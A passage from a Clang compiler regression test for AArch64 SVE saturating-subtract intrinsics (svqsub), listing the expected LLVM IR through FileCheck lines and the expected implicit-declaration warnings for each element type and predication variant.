{{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_m'}} return SVE_ACLE_FUNC(svqsub,_s16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s32_mu10__SVBool_tu11__SVInt32_tu11__SVInt32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // svint32_t test_svqsub_s32_m(svbool_t pg, svint32_t op1, svint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_m'}} return SVE_ACLE_FUNC(svqsub,_s32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s64_mu10__SVBool_tu11__SVInt64_tu11__SVInt64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // svint64_t test_svqsub_s64_m(svbool_t pg, svint64_t op1, svint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_m'}} return SVE_ACLE_FUNC(svqsub,_s64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_u8_mu10__SVBool_tu11__SVUint8_tu11__SVUint8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // svuint8_t test_svqsub_u8_m(svbool_t pg, svuint8_t op1, svuint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_m'}} return SVE_ACLE_FUNC(svqsub,_u8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u16_mu10__SVBool_tu12__SVUint16_tu12__SVUint16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // svuint16_t test_svqsub_u16_m(svbool_t pg, svuint16_t op1, svuint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_m'}} return SVE_ACLE_FUNC(svqsub,_u16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u32_mu10__SVBool_tu12__SVUint32_tu12__SVUint32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // svuint32_t test_svqsub_u32_m(svbool_t pg, svuint32_t op1, svuint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_m'}} return SVE_ACLE_FUNC(svqsub,_u32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u64_mu10__SVBool_tu12__SVUint64_tu12__SVUint64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // svuint64_t test_svqsub_u64_m(svbool_t pg, svuint64_t op1, svuint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_m'}} return SVE_ACLE_FUNC(svqsub,_u64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_s8_xu10__SVBool_tu10__SVInt8_tu10__SVInt8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // svint8_t test_svqsub_s8_x(svbool_t pg, svint8_t op1, svint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_x'}} return SVE_ACLE_FUNC(svqsub,_s8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s16_xu10__SVBool_tu11__SVInt16_tu11__SVInt16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // svint16_t test_svqsub_s16_x(svbool_t pg, svint16_t op1, svint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_x'}} return SVE_ACLE_FUNC(svqsub,_s16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s32_xu10__SVBool_tu11__SVInt32_tu11__SVInt32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // svint32_t test_svqsub_s32_x(svbool_t pg, svint32_t op1, svint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_x'}} return SVE_ACLE_FUNC(svqsub,_s32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_s64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_s64_xu10__SVBool_tu11__SVInt64_tu11__SVInt64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // svint64_t test_svqsub_s64_x(svbool_t pg, svint64_t op1, svint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_x'}} return SVE_ACLE_FUNC(svqsub,_s64,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // // CPP-CHECK-LABEL: @_Z16test_svqsub_u8_xu10__SVBool_tu11__SVUint8_tu11__SVUint8_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP0]] // svuint8_t test_svqsub_u8_x(svbool_t pg, svuint8_t op1, svuint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_x'}} return SVE_ACLE_FUNC(svqsub,_u8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u16_xu10__SVBool_tu12__SVUint16_tu12__SVUint16_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP1]] // svuint16_t test_svqsub_u16_x(svbool_t pg, svuint16_t op1, svuint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_x'}} return SVE_ACLE_FUNC(svqsub,_u16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u32_xu10__SVBool_tu12__SVUint32_tu12__SVUint32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // svuint32_t test_svqsub_u32_x(svbool_t pg, svuint32_t op1, svuint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_x'}} return SVE_ACLE_FUNC(svqsub,_u32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u64_xu10__SVBool_tu12__SVUint64_tu12__SVUint64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // svuint64_t test_svqsub_u64_x(svbool_t pg, svuint64_t op1, svuint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_x'}} return SVE_ACLE_FUNC(svqsub,_u64,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_zu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // svint8_t test_svqsub_n_s8_z(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_z'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_zu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // svint16_t test_svqsub_n_s16_z(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_z'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_zu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // svint32_t test_svqsub_n_s32_z(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_z'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_zu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: 